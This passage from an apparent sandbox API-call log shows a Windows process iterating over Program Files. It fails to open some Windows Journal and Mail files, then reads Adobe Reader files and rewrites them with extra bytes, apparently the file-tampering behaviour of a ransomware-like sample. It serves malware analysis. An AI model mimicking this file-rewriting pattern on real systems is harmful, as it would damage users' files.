lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui", lpFilePart=0x359f690*="JNTFiltr.dll.mui") returned 0x37 [0076.108] GetLastError () returned 0x5 [0076.108] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x13 [0076.108] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.108] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.108] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.109] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.109] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.109] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jntfiltr.dll.mui")) returned 0x20 [0076.110] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\PDIALOG.exe" (normalized: "c:\\program files\\windows journal\\pdialog.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.117] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\PDIALOG.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\PDIALOG.exe", lpFilePart=0x359f690*="PDIALOG.exe") returned 0x2c [0076.117] GetLastError () returned 0x5 [0076.117] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x13 [0076.117] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.117] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.118] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.118] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.118] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\PDIALOG.exe" (normalized: "c:\\program files\\windows journal\\pdialog.exe")) returned 0x20 [0076.119] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" (normalized: "c:\\program files\\windows journal\\templates\\music.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.119] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Music.jtp", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Music.jtp", lpFilePart=0x359f690*="Music.jtp") returned 0x34 [0076.119] GetLastError () returned 0x5 [0076.120] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x13 [0076.120] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.120] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.120] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.120] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.121] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Music.jtp" (normalized: "c:\\program files\\windows journal\\templates\\music.jtp")) returned 0x20 [0076.121] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\wab.exe" (normalized: "c:\\program files\\windows mail\\wab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.520] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\wab.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\wab.exe", lpFilePart=0x359f690*="wab.exe") returned 0x25 [0076.521] GetLastError () returned 0x5 [0076.521] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x13 [0076.521] LocalFree (hMem=0x69e2b0) returned 0x0 [0076.521] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.521] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.521] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.521] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\wab.exe" (normalized: "c:\\program files\\windows mail\\wab.exe")) returned 0x20 [0076.522] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices\\sufficiently_awarded.exe" (normalized: "c:\\program files\\windows portable devices\\sufficiently_awarded.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\sufficiently_awarded.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\sufficiently_awarded.exe", lpFilePart=0x359f690*="sufficiently_awarded.exe") returned 0x42 [0076.522] GetLastError () returned 0x20 [0076.522] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i͙폈H͙퐔H͙L͙ꪘǷ\x01") returned 0x51 [0076.522] LocalFree (hMem=0x696d00) returned 0x0 [0076.522] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0076.522] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0076.523] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.523] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0076.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices\\sufficiently_awarded.exe" (normalized: "c:\\program files\\windows portable devices\\sufficiently_awarded.exe")) returned 0x20 [0076.523] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.524] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.524] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41e3 [0076.525] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.525] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.525] ReleaseMutex (hMutex=0x168) returned 1 [0076.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LeesMij.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LeesMij.htm", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeesMij.htm", lpUsedDefaultChar=0x0) returned 11 [0076.525] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x31e3 [0076.528] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x31e3 [0076.528] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.528] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.528] WriteFile (in: hFile=0x204, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.529] CloseHandle (hObject=0x204) returned 1 [0076.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.529] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x13ad98 [0076.530] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.530] ReleaseMutex (hMutex=0x168) returned 1 [0076.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroRd32.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroRd32.exe", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroRd32.exe", lpUsedDefaultChar=0x0) returned 12 [0076.530] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0076.534] ReadFile (in: hFile=0x204, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x139d98 [0076.535] ReadFile (in: hFile=0x204, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.540] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x139d98 [0076.540] WriteFile (in: hFile=0x204, lpBuffer=0x2872fe8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fe8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.541] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0076.541] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0076.543] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.543] CloseHandle (hObject=0x204) returned 1 [0076.543] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e00 [0076.544] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.544] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.545] ReleaseMutex (hMutex=0x168) returned 1 [0076.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHT", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CHT", lpUsedDefaultChar=0x0) returned 11 [0076.545] ReadFile (in: hFile=0x204, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x359f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0076.547] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.547] WriteFile (in: hFile=0x204, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0076.548] CloseHandle (hObject=0x204) returned 1 [0076.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.549] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.549] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e00 [0076.549] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.549] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.549] ReleaseMutex (hMutex=0x168) returned 1 [0076.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HUN", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.HUN", lpUsedDefaultChar=0x0) returned 11 [0076.550] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0076.552] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.552] WriteFile (in: hFile=0x204, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0076.553] CloseHandle (hObject=0x204) returned 1 [0076.554] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0076.554] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.554] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0076.555] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.555] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.555] ReleaseMutex (hMutex=0x168) returned 1 [0076.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUM", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.RUM", lpUsedDefaultChar=0x0) returned 11 [0076.555] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0076.557] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.558] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0076.558] CloseHandle (hObject=0x204) returned 1 [0076.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.844] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.844] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e00 [0076.844] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.844] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.844] ReleaseMutex (hMutex=0x168) returned 1 [0076.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CAT", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CAT", lpUsedDefaultChar=0x0) returned 11 [0076.845] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x359f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0076.847] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0076.847] WriteFile (in: hFile=0x1d4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x359f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0076.848] CloseHandle (hObject=0x1d4) returned 1 [0076.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.849] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.849] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0076.850] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0076.850] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.850] ReleaseMutex (hMutex=0x168) returned 1 [0076.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.FRA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.FRA", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.FRA", lpUsedDefaultChar=0x0) returned 11 [0076.850] ReadFile (in: hFile=0x1d4, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x2000, 